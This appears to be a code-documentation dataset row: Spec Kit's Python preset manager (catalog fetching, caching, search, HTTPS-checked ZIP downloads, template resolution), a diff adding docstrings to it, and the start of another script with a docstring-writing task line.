        if not force_refresh and self._is_url_cache_valid(entry.url):
            try:
                return json.loads(cache_file.read_text())
            except json.JSONDecodeError:
                pass
        try:
            import urllib.request
            import urllib.error
            with urllib.request.urlopen(entry.url, timeout=10) as response:
                catalog_data = json.loads(response.read())
            if (
                "schema_version" not in catalog_data
                or "presets" not in catalog_data
            ):
                raise PresetError("Invalid preset catalog format")
            self.cache_dir.mkdir(parents=True, exist_ok=True)
            cache_file.write_text(json.dumps(catalog_data, indent=2))
            metadata = {
                "cached_at": datetime.now(timezone.utc).isoformat(),
                "catalog_url": entry.url,
            }
            metadata_file.write_text(json.dumps(metadata, indent=2))
            return catalog_data
        except PresetError:
            # Already a domain error (e.g. invalid format) — surface as-is.
            raise
        except Exception as e:
            raise PresetError(
                f"Failed to fetch preset catalog from {entry.url}: {e}"
            )
    def _get_merged_packs(self, force_refresh: bool = False) -> Dict[str, Dict[str, Any]]:
        """Merge presets from all active catalogs.

        Iterates catalogs in reverse priority order so higher-priority
        catalogs overwrite lower-priority entries with the same ID.
        Edge case: a catalog that fails to fetch is skipped silently so
        one dead mirror cannot break discovery.
        """
        active_catalogs = self.get_active_catalogs()
        merged: Dict[str, Dict[str, Any]] = {}
        for entry in reversed(active_catalogs):
            try:
                data = self._fetch_single_catalog(entry, force_refresh)
                for pack_id, pack_data in data.get("presets", {}).items():
                    pack_data_with_catalog = {**pack_data, "_catalog_name": entry.name, "_install_allowed": entry.install_allowed}
                    merged[pack_id] = pack_data_with_catalog
            except PresetError:
                continue
        return merged
    def is_cache_valid(self) -> bool:
        """Return True when the legacy default-catalog cache is fresh.

        Same fallbacks as ``_is_url_cache_valid``: any missing file or
        parse/timestamp error reports False.
        """
        if not self.cache_file.exists() or not self.cache_metadata_file.exists():
            return False
        try:
            metadata = json.loads(self.cache_metadata_file.read_text())
            cached_at = datetime.fromisoformat(metadata.get("cached_at", ""))
            if cached_at.tzinfo is None:
                cached_at = cached_at.replace(tzinfo=timezone.utc)
            age_seconds = (
                datetime.now(timezone.utc) - cached_at
            ).total_seconds()
            return age_seconds < self.CACHE_DURATION
        except (json.JSONDecodeError, ValueError, KeyError, TypeError):
            return False
    def fetch_catalog(self, force_refresh: bool = False) -> Dict[str, Any]:
        """Fetch the primary catalog, honoring the legacy cache.

        Edge cases: the cache is only reused when its recorded URL
        matches the currently active URL (so switching catalogs busts
        the cache); a corrupt or unreadable cache falls through to a
        network fetch.

        Raises:
            PresetError: malformed catalog payload or any fetch failure.
        """
        catalog_url = self.get_catalog_url()
        if not force_refresh and self.is_cache_valid():
            try:
                metadata = json.loads(self.cache_metadata_file.read_text())
                if metadata.get("catalog_url") == catalog_url:
                    return json.loads(self.cache_file.read_text())
            except (json.JSONDecodeError, OSError):
                # Cache is corrupt or unreadable; fall through to network fetch
                pass
        try:
            import urllib.request
            import urllib.error
            with urllib.request.urlopen(catalog_url, timeout=10) as response:
                catalog_data = json.loads(response.read())
            if (
                "schema_version" not in catalog_data
                or "presets" not in catalog_data
            ):
                raise PresetError("Invalid preset catalog format")
            self.cache_dir.mkdir(parents=True, exist_ok=True)
            self.cache_file.write_text(json.dumps(catalog_data, indent=2))
            metadata = {
                "cached_at": datetime.now(timezone.utc).isoformat(),
                "catalog_url": catalog_url,
            }
            self.cache_metadata_file.write_text(
                json.dumps(metadata, indent=2)
            )
            return catalog_data
        except PresetError:
            # Already a domain error (e.g. invalid format) — surface as-is.
            raise
        except Exception as e:
            raise PresetError(
                f"Failed to fetch preset catalog from {catalog_url}: {e}"
            )
    def search(
        self,
        query: Optional[str] = None,
        tag: Optional[str] = None,
        author: Optional[str] = None,
    ) -> List[Dict[str, Any]]:
        """Search merged catalogs; all filters are case-insensitive AND-ed.

        Edge cases: a total catalog-fetch failure returns ``[]`` rather
        than raising; with no filters every pack is returned; the query
        matches against name, description, id, and tags.
        """
        try:
            packs = self._get_merged_packs()
        except PresetError:
            return []
        results = []
        for pack_id, pack_data in packs.items():
            if author and pack_data.get("author", "").lower() != author.lower():
                continue
            if tag and tag.lower() not in [
                t.lower() for t in pack_data.get("tags", [])
            ]:
                continue
            if query:
                query_lower = query.lower()
                searchable_text = " ".join(
                    [
                        pack_data.get("name", ""),
                        pack_data.get("description", ""),
                        pack_id,
                    ]
                    + pack_data.get("tags", [])
                ).lower()
                if query_lower not in searchable_text:
                    continue
            results.append({**pack_data, "id": pack_id})
        return results
    def get_pack_info(
        self, pack_id: str
    ) -> Optional[Dict[str, Any]]:
        """Return catalog info for *pack_id*, or None.

        Edge case: both "not in any catalog" and "catalogs unreachable"
        yield None — callers cannot distinguish the two here.
        """
        try:
            packs = self._get_merged_packs()
        except PresetError:
            return None
        if pack_id in packs:
            return {**packs[pack_id], "id": pack_id}
        return None
    def download_pack(
        self, pack_id: str, target_dir: Optional[Path] = None
    ) -> Path:
        """Download a preset ZIP and return its local path.

        Raises:
            PresetError: unknown pack, install-disallowed catalog,
                missing download URL, non-HTTPS URL (except localhost
                HTTP), network failure, or write failure.

        Edge case: when *target_dir* is None the ZIP is placed in the
        catalog cache's ``downloads`` directory, created on demand.
        """
        import urllib.request
        import urllib.error
        pack_info = self.get_pack_info(pack_id)
        if not pack_info:
            raise PresetError(
                f"Preset '{pack_id}' not found in catalog"
            )
        if not pack_info.get("_install_allowed", True):
            catalog_name = pack_info.get("_catalog_name", "unknown")
            raise PresetError(
                f"Preset '{pack_id}' is from the '{catalog_name}' catalog which does not allow installation. "
                f"Use --from with the preset's repository URL instead."
            )
        download_url = pack_info.get("download_url")
        if not download_url:
            raise PresetError(
                f"Preset '{pack_id}' has no download URL"
            )
        from urllib.parse import urlparse
        parsed = urlparse(download_url)
        is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
        if parsed.scheme != "https" and not (
            parsed.scheme == "http" and is_localhost
        ):
            raise PresetError(
                f"Preset download URL must use HTTPS: {download_url}"
            )
        if target_dir is None:
            target_dir = self.cache_dir / "downloads"
        target_dir.mkdir(parents=True, exist_ok=True)
        version = pack_info.get("version", "unknown")
        zip_filename = f"{pack_id}-{version}.zip"
        zip_path = target_dir / zip_filename
        try:
            with urllib.request.urlopen(download_url, timeout=60) as response:
                zip_data = response.read()
            zip_path.write_bytes(zip_data)
            return zip_path
        except urllib.error.URLError as e:
            raise PresetError(
                f"Failed to download preset from {download_url}: {e}"
            )
        except IOError as e:
            raise PresetError(f"Failed to save preset ZIP: {e}")
    def clear_cache(self):
        """Delete all cached catalog files.

        Edge cases: a missing cache directory is a no-op; only regular
        files whose names start with "catalog" are removed, so the
        ``downloads`` subdirectory is left intact.
        """
        if self.cache_dir.exists():
            for f in self.cache_dir.iterdir():
                if f.is_file() and f.name.startswith("catalog"):
                    f.unlink(missing_ok=True)
class PresetResolver:
    """Resolves template names to files through the override hierarchy.

    Lookup order: project-local overrides, installed presets (by
    priority), extension-provided templates (by priority), then core
    templates. The first existing file wins.
    """
    def __init__(self, project_root: Path):
        """Bind to *project_root*; directories are probed lazily at resolve time."""
        self.project_root = project_root
        self.templates_dir = project_root / ".specify" / "templates"
        self.presets_dir = project_root / ".specify" / "presets"
        self.overrides_dir = self.templates_dir / "overrides"
        self.extensions_dir = project_root / ".specify" / "extensions"
    def _get_all_extensions_by_priority(self) -> list[tuple[int, str, dict | None]]:
        """Return (priority, ext_id, metadata) for every extension directory.

        Edge cases: a missing extensions directory yields ``[]``;
        directories present on disk but absent from the registry are
        included with implicit priority 10 and ``None`` metadata; hidden
        directories (leading dot) are skipped. Sorted by
        (priority, ext_id) for deterministic resolution.
        """
        if not self.extensions_dir.exists():
            return []
        registry = ExtensionRegistry(self.extensions_dir)
        registered_extensions = registry.list_by_priority()
        registered_extension_ids = {ext_id for ext_id, _ in registered_extensions}
        all_extensions: list[tuple[int, str, dict | None]] = []
        for ext_id, metadata in registered_extensions:
            priority = normalize_priority(metadata.get("priority") if metadata else None)
            all_extensions.append((priority, ext_id, metadata))
        # Add unregistered directories with implicit priority=10
        for ext_dir in self.extensions_dir.iterdir():
            if not ext_dir.is_dir() or ext_dir.name.startswith("."):
                continue
            if ext_dir.name not in registered_extension_ids:
                all_extensions.append((10, ext_dir.name, None))
        # Sort by (priority, ext_id) for deterministic ordering
        all_extensions.sort(key=lambda x: (x[0], x[1]))
        return all_extensions
    def resolve(
        self,
        template_name: str,
        template_type: str = "template",
    ) -> Optional[Path]:
        """Resolve *template_name* to a file path, or None when not found.

        Edge cases: unknown *template_type* values fall back to a bare
        (no-subdirectory) lookup with a ``.md`` extension; scripts are
        resolved as ``.sh`` only — callers needing PowerShell must check
        ``.ps1`` themselves; presets are searched both in a
        ``templates/`` subdirectory and at the pack root.
        """
        # Determine subdirectory based on template type
        if template_type == "template":
            subdirs = ["templates", ""]
        elif template_type == "command":
            subdirs = ["commands"]
        elif template_type == "script":
            subdirs = ["scripts"]
        else:
            subdirs = [""]
        # Determine file extension based on template type
        ext = ".md"
        if template_type == "script":
            ext = ".sh"  # scripts use .sh; callers can also check .ps1
        # Priority 1: Project-local overrides
        if template_type == "script":
            override = self.overrides_dir / "scripts" / f"{template_name}{ext}"
        else:
            override = self.overrides_dir / f"{template_name}{ext}"
        if override.exists():
            return override
        # Priority 2: Installed presets (sorted by priority — lower number wins)
        if self.presets_dir.exists():
            registry = PresetRegistry(self.presets_dir)
            for pack_id, _metadata in registry.list_by_priority():
                pack_dir = self.presets_dir / pack_id
                for subdir in subdirs:
                    if subdir:
                        candidate = pack_dir / subdir / f"{template_name}{ext}"
                    else:
                        candidate = pack_dir / f"{template_name}{ext}"
                    if candidate.exists():
                        return candidate
        # Priority 3: Extension-provided templates (sorted by priority — lower number wins)
        for _priority, ext_id, _metadata in self._get_all_extensions_by_priority():
            ext_dir = self.extensions_dir / ext_id
            if not ext_dir.is_dir():
                continue
            for subdir in subdirs:
                if subdir:
                    candidate = ext_dir / subdir / f"{template_name}{ext}"
                else:
                    candidate = ext_dir / f"{template_name}{ext}"
                if candidate.exists():
                    return candidate
        # Priority 4: Core templates
        if template_type == "template":
            core = self.templates_dir / f"{template_name}.md"
            if core.exists():
                return core
        elif template_type == "command":
            core = self.templates_dir / "commands" / f"{template_name}.md"
            if core.exists():
                return core
        elif template_type == "script":
            core = self.templates_dir / "scripts" / f"{template_name}{ext}"
            if core.exists():
                return core
        return None
    def resolve_with_source(
        self,
        template_name: str,
        template_type: str = "template",
    ) -> Optional[Dict[str, str]]:
        """Resolve a template and report which layer supplied it.

        Returns ``{"path": ..., "source": ...}`` or None when not found.
        Edge cases: a preset/extension hit that cannot be attributed to a
        specific pack (e.g. registry changed between lookups) falls
        through to the "core" label; unregistered extensions are labeled
        "(unregistered)" instead of a version.
        """
        # Delegate to resolve() for the actual lookup, then determine source
        resolved = self.resolve(template_name, template_type)
        if resolved is None:
            return None
        resolved_str = str(resolved)
        # Determine source attribution
        if str(self.overrides_dir) in resolved_str:
            return {"path": resolved_str, "source": "project override"}
        if str(self.presets_dir) in resolved_str and self.presets_dir.exists():
            registry = PresetRegistry(self.presets_dir)
            for pack_id, _metadata in registry.list_by_priority():
                pack_dir = self.presets_dir / pack_id
                try:
                    resolved.relative_to(pack_dir)
                    meta = registry.get(pack_id)
                    version = meta.get("version", "?") if meta else "?"
                    return {
                        "path": resolved_str,
                        "source": f"{pack_id} v{version}",
                    }
                except ValueError:
                    continue
        for _priority, ext_id, ext_meta in self._get_all_extensions_by_priority():
            ext_dir = self.extensions_dir / ext_id
            if not ext_dir.is_dir():
                continue
            try:
                resolved.relative_to(ext_dir)
                if ext_meta:
                    version = ext_meta.get("version", "?")
                    return {
                        "path": resolved_str,
                        "source": f"extension:{ext_id} v{version}",
                    }
                else:
                    return {
                        "path": resolved_str,
                        "source": f"extension:{ext_id} (unregistered)",
                    }
            except ValueError:
                continue
        return {"path": resolved_str, "source": "core"}
+Preset Manager for Spec Kit
+
+Handles installation, removal, and management of Spec Kit presets.
+Presets are self-contained, versioned collections of templates
+(artifact, command, and script templates) that can be installed to
+customize the Spec-Driven Development workflow.
+"""
import copy
import json
@@ -21,6 +29,7 @@
@dataclass
class PresetCatalogEntry:
+ """Represents a single entry in the preset catalog stack."""
url: str
name: str
priority: int
@@ -29,14 +38,17 @@
class PresetError(Exception):
+ """Base exception for preset-related errors."""
pass
class PresetValidationError(PresetError):
+ """Raised when preset manifest validation fails."""
pass
class PresetCompatibilityError(PresetError):
+ """Raised when preset is incompatible with current environment."""
pass
@@ -44,16 +56,26 @@
class PresetManifest:
+ """Represents and validates a preset manifest (preset.yml)."""
SCHEMA_VERSION = "1.0"
REQUIRED_FIELDS = ["schema_version", "preset", "requires", "provides"]
def __init__(self, manifest_path: Path):
+ """Load and validate preset manifest.
+
+ Args:
+ manifest_path: Path to preset.yml file
+
+ Raises:
+ PresetValidationError: If manifest is invalid
+ """
self.path = manifest_path
self.data = self._load_yaml(manifest_path)
self._validate()
def _load_yaml(self, path: Path) -> dict:
+ """Load YAML file safely."""
try:
with open(path, 'r') as f:
return yaml.safe_load(f) or {}
@@ -63,6 +85,7 @@ raise PresetValidationError(f"Manifest not found: {path}")
def _validate(self):
+ """Validate manifest structure and required fields."""
# Check required top-level fields
for field in self.REQUIRED_FIELDS:
if field not in self.data:
@@ -145,52 +168,68 @@
@property
def id(self) -> str:
+ """Get preset ID."""
return self.data["preset"]["id"]
@property
def name(self) -> str:
+ """Get preset name."""
return self.data["preset"]["name"]
@property
def version(self) -> str:
+ """Get preset version."""
return self.data["preset"]["version"]
@property
def description(self) -> str:
+ """Get preset description."""
return self.data["preset"]["description"]
@property
def author(self) -> str:
+ """Get preset author."""
return self.data["preset"].get("author", "")
@property
def requires_speckit_version(self) -> str:
+ """Get required spec-kit version range."""
return self.data["requires"]["speckit_version"]
@property
def templates(self) -> List[Dict[str, Any]]:
+ """Get list of provided templates."""
return self.data["provides"]["templates"]
@property
def tags(self) -> List[str]:
+ """Get preset tags."""
return self.data.get("tags", [])
def get_hash(self) -> str:
+ """Calculate SHA256 hash of manifest file."""
with open(self.path, 'rb') as f:
return f"sha256:{hashlib.sha256(f.read()).hexdigest()}"
class PresetRegistry:
+ """Manages the registry of installed presets."""
REGISTRY_FILE = ".registry"
SCHEMA_VERSION = "1.0"
def __init__(self, packs_dir: Path):
+ """Initialize registry.
+
+ Args:
+ packs_dir: Path to .specify/presets/ directory
+ """
self.packs_dir = packs_dir
self.registry_path = packs_dir / self.REGISTRY_FILE
self.data = self._load()
def _load(self) -> dict:
+ """Load registry from disk."""
if not self.registry_path.exists():
return {
"schema_version": self.SCHEMA_VERSION,
@@ -207,11 +246,18 @@ }
def _save(self):
+ """Save registry to disk."""
self.packs_dir.mkdir(parents=True, exist_ok=True)
with open(self.registry_path, 'w') as f:
json.dump(self.data, f, indent=2)
def add(self, pack_id: str, metadata: dict):
+ """Add preset to registry.
+
+ Args:
+ pack_id: Preset ID
+ metadata: Pack metadata (version, source, etc.)
+ """
self.data["presets"][pack_id] = {
**metadata,
"installed_at": datetime.now(timezone.utc).isoformat()
@@ -219,11 +265,29 @@ self._save()
def remove(self, pack_id: str):
+ """Remove preset from registry.
+
+ Args:
+ pack_id: Preset ID
+ """
if pack_id in self.data["presets"]:
del self.data["presets"][pack_id]
self._save()
def update(self, pack_id: str, updates: dict):
+ """Update preset metadata in registry.
+
+ Merges the provided updates with the existing entry, preserving any
+ fields not specified. The installed_at timestamp is always preserved
+ from the original entry.
+
+ Args:
+ pack_id: Preset ID
+ updates: Partial metadata to merge into existing metadata
+
+ Raises:
+ KeyError: If preset is not installed
+ """
if pack_id not in self.data["presets"]:
raise KeyError(f"Preset '{pack_id}' not found in registry")
existing = self.data["presets"][pack_id]
@@ -243,12 +307,35 @@ self._save()
def get(self, pack_id: str) -> Optional[dict]:
+ """Get preset metadata from registry.
+
+ Args:
+ pack_id: Preset ID
+
+ Returns:
+ Pack metadata or None if not found
+ """
return self.data["presets"].get(pack_id)
def list(self) -> Dict[str, dict]:
+ """Get all installed presets.
+
+ Returns:
+ Dictionary of pack_id -> metadata
+ """
return self.data["presets"]
def list_by_priority(self) -> List[tuple]:
+ """Get all installed presets sorted by priority.
+
+ Lower priority number = higher precedence (checked first).
+ Presets with equal priority are sorted alphabetically by ID
+ for deterministic ordering.
+
+ Returns:
+ List of (pack_id, metadata_copy) tuples sorted by priority.
+ Metadata is deep-copied to prevent accidental mutation.
+ """
packs = self.data.get("presets", {}) or {}
if not isinstance(packs, dict):
packs = {}
@@ -265,12 +352,26 @@ )
def is_installed(self, pack_id: str) -> bool:
+ """Check if preset is installed.
+
+ Args:
+ pack_id: Preset ID
+
+ Returns:
+ True if pack is installed
+ """
return pack_id in self.data["presets"]
class PresetManager:
+ """Manages preset lifecycle: installation, removal, updates."""
def __init__(self, project_root: Path):
+ """Initialize preset manager.
+
+ Args:
+ project_root: Path to project root directory
+ """
self.project_root = project_root
self.presets_dir = project_root / ".specify" / "presets"
self.registry = PresetRegistry(self.presets_dir)
@@ -280,6 +381,18 @@ manifest: PresetManifest,
speckit_version: str
) -> bool:
+ """Check if preset is compatible with current spec-kit version.
+
+ Args:
+ manifest: Preset manifest
+ speckit_version: Current spec-kit version
+
+ Returns:
+ True if compatible
+
+ Raises:
+ PresetCompatibilityError: If pack is incompatible
+ """
required = manifest.requires_speckit_version
current = pkg_version.Version(speckit_version)
@@ -303,6 +416,19 @@ manifest: PresetManifest,
preset_dir: Path
) -> Dict[str, List[str]]:
+ """Register preset command overrides with all detected AI agents.
+
+ Scans the preset's templates for type "command", reads each command
+ file, and writes it to every detected agent directory using the
+ CommandRegistrar from the agents module.
+
+ Args:
+ manifest: Preset manifest
+ preset_dir: Installed preset directory
+
+ Returns:
+ Dictionary mapping agent names to lists of registered command names
+ """
command_templates = [
t for t in manifest.templates if t.get("type") == "command"
]
@@ -336,6 +462,11 @@ )
def _unregister_commands(self, registered_commands: Dict[str, List[str]]) -> None:
+ """Remove previously registered command files from agent directories.
+
+ Args:
+ registered_commands: Dict mapping agent names to command name lists
+ """
try:
from .agents import CommandRegistrar
except ImportError:
@@ -345,6 +476,16 @@ registrar.unregister_commands(registered_commands, self.project_root)
def _get_skills_dir(self) -> Optional[Path]:
+ """Return the skills directory if ``--ai-skills`` was used during init.
+
+ Reads ``.specify/init-options.json`` to determine whether skills
+ are enabled and which agent was selected, then delegates to
+ the module-level ``_get_skills_dir()`` helper for the concrete path.
+
+ Returns:
+ The skills directory ``Path``, or ``None`` if skills were not
+ enabled or the init-options file is missing.
+ """
from . import load_init_options, _get_skills_dir
opts = load_init_options(self.project_root)
@@ -366,6 +507,22 @@ manifest: "PresetManifest",
preset_dir: Path,
) -> List[str]:
+ """Generate SKILL.md files for preset command overrides.
+
+ For every command template in the preset, checks whether a
+ corresponding skill already exists in any detected skills
+ directory. If so, the skill is overwritten with content derived
+ from the preset's command file. This ensures that presets that
+ override commands also propagate to the agentskills.io skill
+ layer when ``--ai-skills`` was used during project initialisation.
+
+ Args:
+ manifest: Preset manifest.
+ preset_dir: Installed preset directory.
+
+ Returns:
+ List of skill names that were written (for registry storage).
+ """
command_templates = [
t for t in manifest.templates if t.get("type") == "command"
]
@@ -468,6 +625,16 @@ return written
def _unregister_skills(self, skill_names: List[str], preset_dir: Path) -> None:
+ """Restore original SKILL.md files after a preset is removed.
+
+ For each skill that was overridden by the preset, attempts to
+ regenerate the skill from the core command template. If no core
+ template exists, the skill directory is removed.
+
+ Args:
+ skill_names: List of skill names written by the preset.
+ preset_dir: The preset's installed directory (may already be deleted).
+ """
if not skill_names:
return
@@ -549,6 +716,20 @@ speckit_version: str,
priority: int = 10,
) -> PresetManifest:
+ """Install preset from a local directory.
+
+ Args:
+ source_dir: Path to preset directory
+ speckit_version: Current spec-kit version
+ priority: Resolution priority (lower = higher precedence, default 10)
+
+ Returns:
+ Installed preset manifest
+
+ Raises:
+ PresetValidationError: If manifest is invalid or priority is invalid
+ PresetCompatibilityError: If pack is incompatible
+ """
# Validate priority
if priority < 1:
raise PresetValidationError("Priority must be a positive integer (1 or higher)")
@@ -594,6 +775,20 @@ speckit_version: str,
priority: int = 10,
) -> PresetManifest:
+ """Install preset from ZIP file.
+
+ Args:
+ zip_path: Path to preset ZIP file
+ speckit_version: Current spec-kit version
+ priority: Resolution priority (lower = higher precedence, default 10)
+
+ Returns:
+ Installed preset manifest
+
+ Raises:
+ PresetValidationError: If manifest is invalid or priority is invalid
+ PresetCompatibilityError: If pack is incompatible
+ """
# Validate priority early
if priority < 1:
raise PresetValidationError("Priority must be a positive integer (1 or higher)")
@@ -631,6 +826,14 @@ return self.install_from_directory(pack_dir, speckit_version, priority)
def remove(self, pack_id: str) -> bool:
+ """Remove an installed preset.
+
+ Args:
+ pack_id: Preset ID
+
+ Returns:
+ True if pack was removed
+ """
if not self.registry.is_installed(pack_id):
return False
@@ -653,6 +856,11 @@ return True
def list_installed(self) -> List[Dict[str, Any]]:
+ """List all installed presets with metadata.
+
+ Returns:
+ List of preset metadata dictionaries
+ """
result = []
for pack_id, metadata in self.registry.list().items():
@@ -691,6 +899,14 @@ return result
def get_pack(self, pack_id: str) -> Optional[PresetManifest]:
+ """Get manifest for an installed preset.
+
+ Args:
+ pack_id: Preset ID
+
+ Returns:
+ Preset manifest or None if not installed
+ """
if not self.registry.is_installed(pack_id):
return None
@@ -704,12 +920,22 @@
class PresetCatalog:
+ """Manages preset catalog fetching, caching, and searching.
+
+ Supports multi-catalog stacks with priority-based resolution,
+ mirroring the extension catalog system.
+ """
DEFAULT_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/presets/catalog.json"
COMMUNITY_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/presets/catalog.community.json"
CACHE_DURATION = 3600 # 1 hour in seconds
def __init__(self, project_root: Path):
+ """Initialize preset catalog manager.
+
+ Args:
+ project_root: Root directory of the spec-kit project
+ """
self.project_root = project_root
self.presets_dir = project_root / ".specify" / "presets"
self.cache_dir = self.presets_dir / ".cache"
@@ -717,6 +943,14 @@ self.cache_metadata_file = self.cache_dir / "catalog-metadata.json"
def _validate_catalog_url(self, url: str) -> None:
+ """Validate that a catalog URL uses HTTPS (localhost HTTP allowed).
+
+ Args:
+ url: URL to validate
+
+ Raises:
+ PresetValidationError: If URL is invalid or uses non-HTTPS scheme
+ """
from urllib.parse import urlparse
parsed = urlparse(url)
@@ -734,6 +968,19 @@ )
def _load_catalog_config(self, config_path: Path) -> Optional[List[PresetCatalogEntry]]:
+ """Load catalog stack configuration from a YAML file.
+
+ Args:
+ config_path: Path to preset-catalogs.yml
+
+ Returns:
+ Ordered list of PresetCatalogEntry objects, or None if file
+ doesn't exist or contains no valid catalog entries.
+
+ Raises:
+ PresetValidationError: If any catalog entry has an invalid URL,
+ the file cannot be parsed, or a priority value is invalid.
+ """
if not config_path.exists():
return None
try:
@@ -786,6 +1033,20 @@ return entries if entries else None
def get_active_catalogs(self) -> List[PresetCatalogEntry]:
+ """Get the ordered list of active preset catalogs.
+
+ Resolution order:
+ 1. SPECKIT_PRESET_CATALOG_URL env var — single catalog replacing all defaults
+ 2. Project-level .specify/preset-catalogs.yml
+ 3. User-level ~/.specify/preset-catalogs.yml
+ 4. Built-in default stack (default + community)
+
+ Returns:
+ List of PresetCatalogEntry objects sorted by priority (ascending)
+
+ Raises:
+ PresetValidationError: If a catalog URL is invalid
+ """
import sys
# 1. SPECKIT_PRESET_CATALOG_URL env var replaces all defaults
@@ -821,10 +1082,26 @@ ]
def get_catalog_url(self) -> str:
+ """Get the primary catalog URL.
+
+ Returns the URL of the highest-priority catalog. Kept for backward
+ compatibility. Use get_active_catalogs() for full multi-catalog support.
+
+ Returns:
+ URL of the primary catalog
+ """
active = self.get_active_catalogs()
return active[0].url if active else self.DEFAULT_CATALOG_URL
def _get_cache_paths(self, url: str):
+ """Get cache file paths for a given catalog URL.
+
+ For the DEFAULT_CATALOG_URL, uses legacy cache files for backward
+ compatibility. For all other URLs, uses URL-hash-based cache files.
+
+ Returns:
+ Tuple of (cache_file_path, cache_metadata_path)
+ """
if url == self.DEFAULT_CATALOG_URL:
return self.cache_file, self.cache_metadata_file
url_hash = hashlib.sha256(url.encode()).hexdigest()[:16]
@@ -834,6 +1111,7 @@ )
def _is_url_cache_valid(self, url: str) -> bool:
+ """Check if cached catalog for a specific URL is still valid."""
cache_file, metadata_file = self._get_cache_paths(url)
if not cache_file.exists() or not metadata_file.exists():
return False
@@ -850,6 +1128,18 @@ return False
def _fetch_single_catalog(self, entry: PresetCatalogEntry, force_refresh: bool = False) -> Dict[str, Any]:
+ """Fetch a single catalog with per-URL caching.
+
+ Args:
+ entry: PresetCatalogEntry describing the catalog to fetch
+ force_refresh: If True, bypass cache
+
+ Returns:
+ Catalog data dictionary
+
+ Raises:
+ PresetError: If catalog cannot be fetched
+ """
cache_file, metadata_file = self._get_cache_paths(entry.url)
if not force_refresh and self._is_url_cache_valid(entry.url):
@@ -889,6 +1179,13 @@ )
def _get_merged_packs(self, force_refresh: bool = False) -> Dict[str, Dict[str, Any]]:
+ """Fetch and merge presets from all active catalogs.
+
+ Higher-priority catalogs (lower priority number) win on ID conflicts.
+
+ Returns:
+ Merged dictionary of pack_id -> pack_data
+ """
active_catalogs = self.get_active_catalogs()
merged: Dict[str, Dict[str, Any]] = {}
@@ -904,6 +1201,11 @@ return merged
def is_cache_valid(self) -> bool:
+ """Check if cached catalog is still valid.
+
+ Returns:
+ True if cache exists and is within cache duration
+ """
if not self.cache_file.exists() or not self.cache_metadata_file.exists():
return False
@@ -920,6 +1222,17 @@ return False
def fetch_catalog(self, force_refresh: bool = False) -> Dict[str, Any]:
+ """Fetch preset catalog from URL or cache.
+
+ Args:
+ force_refresh: If True, bypass cache and fetch from network
+
+ Returns:
+ Catalog data dictionary
+
+ Raises:
+ PresetError: If catalog cannot be fetched
+ """
catalog_url = self.get_catalog_url()
if not force_refresh and self.is_cache_valid():
@@ -970,6 +1283,19 @@ tag: Optional[str] = None,
author: Optional[str] = None,
) -> List[Dict[str, Any]]:
+ """Search catalog for presets.
+
+ Searches across all active catalogs (merged by priority) so that
+ community and custom catalogs are included in results.
+
+ Args:
+ query: Search query (searches name, description, tags)
+ tag: Filter by specific tag
+ author: Filter by author name
+
+ Returns:
+ List of matching preset metadata
+ """
try:
packs = self._get_merged_packs()
except PresetError:
@@ -1007,6 +1333,16 @@ def get_pack_info(
self, pack_id: str
) -> Optional[Dict[str, Any]]:
+ """Get detailed information about a specific preset.
+
+ Searches across all active catalogs (merged by priority).
+
+ Args:
+ pack_id: ID of the preset
+
+ Returns:
+ Pack metadata or None if not found
+ """
try:
packs = self._get_merged_packs()
except PresetError:
@@ -1019,6 +1355,18 @@ def download_pack(
self, pack_id: str, target_dir: Optional[Path] = None
) -> Path:
+ """Download preset ZIP from catalog.
+
+ Args:
+ pack_id: ID of the preset to download
+ target_dir: Directory to save ZIP file (defaults to cache directory)
+
+ Returns:
+ Path to downloaded ZIP file
+
+ Raises:
+ PresetError: If pack not found or download fails
+ """
import urllib.request
import urllib.error
@@ -1075,6 +1423,7 @@ raise PresetError(f"Failed to save preset ZIP: {e}")
def clear_cache(self):
+ """Clear all catalog cache files, including per-URL hashed caches."""
if self.cache_dir.exists():
for f in self.cache_dir.iterdir():
if f.is_file() and f.name.startswith("catalog"):
@@ -1082,8 +1431,21 @@
class PresetResolver:
+ """Resolves template names to file paths using a priority stack.
+
+ Resolution order:
+ 1. .specify/templates/overrides/ - Project-local overrides
+ 2. .specify/presets/<preset-id>/ - Installed presets
+ 3. .specify/extensions/<ext-id>/templates/ - Extension-provided templates
+ 4. .specify/templates/ - Core templates (shipped with Spec Kit)
+ """
def __init__(self, project_root: Path):
+ """Initialize preset resolver.
+
+ Args:
+ project_root: Path to project root directory
+ """
self.project_root = project_root
self.templates_dir = project_root / ".specify" / "templates"
self.presets_dir = project_root / ".specify" / "presets"
@@ -1091,6 +1453,15 @@ self.extensions_dir = project_root / ".specify" / "extensions"
def _get_all_extensions_by_priority(self) -> list[tuple[int, str, dict | None]]:
+ """Build unified list of registered and unregistered extensions sorted by priority.
+
+ Registered extensions use their stored priority; unregistered directories
+ get implicit priority=10. Results are sorted by (priority, ext_id) for
+ deterministic ordering.
+
+ Returns:
+ List of (priority, ext_id, metadata_or_none) tuples sorted by priority.
+ """
if not self.extensions_dir.exists():
return []
@@ -1120,6 +1491,17 @@ template_name: str,
template_type: str = "template",
) -> Optional[Path]:
+ """Resolve a template name to its file path.
+
+ Walks the priority stack and returns the first match.
+
+ Args:
+ template_name: Template name (e.g., "spec-template")
+ template_type: Template type ("template", "command", or "script")
+
+ Returns:
+ Path to the resolved template file, or None if not found
+ """
# Determine subdirectory based on template type
if template_type == "template":
subdirs = ["templates", ""]
@@ -1190,6 +1572,15 @@ template_name: str,
template_type: str = "template",
) -> Optional[Dict[str, str]]:
+ """Resolve a template name and return source attribution.
+
+ Args:
+ template_name: Template name (e.g., "spec-template")
+ template_type: Template type ("template", "command", or "script")
+
+ Returns:
+ Dictionary with 'path' and 'source' keys, or None if not found
+ """
# Delegate to resolve() for the actual lookup, then determine source
resolved = self.resolve(template_name, template_type)
if resolved is None:
@@ -1236,4 +1627,4 @@ except ValueError:
continue
- return {"path": resolved_str, "source": "core"}+ return {"path": resolved_str, "source": "core"}
| https://raw.githubusercontent.com/github/spec-kit/HEAD/src/specify_cli/presets.py |
Create documentation strings for testing functions | #!/usr/bin/env python3
# /// script
# requires-python = ">=3.11"
# dependencies = [
#     "typer",
#     "rich",
#     "platformdirs",
#     "readchar",
#     "httpx",
#     "json5",
#     "pyyaml",
#     "truststore",
# ]
# ///
import os
import subprocess
import sys
import zipfile
import tempfile
import shutil
import shlex
import json
import json5
import stat
import yaml
from pathlib import Path
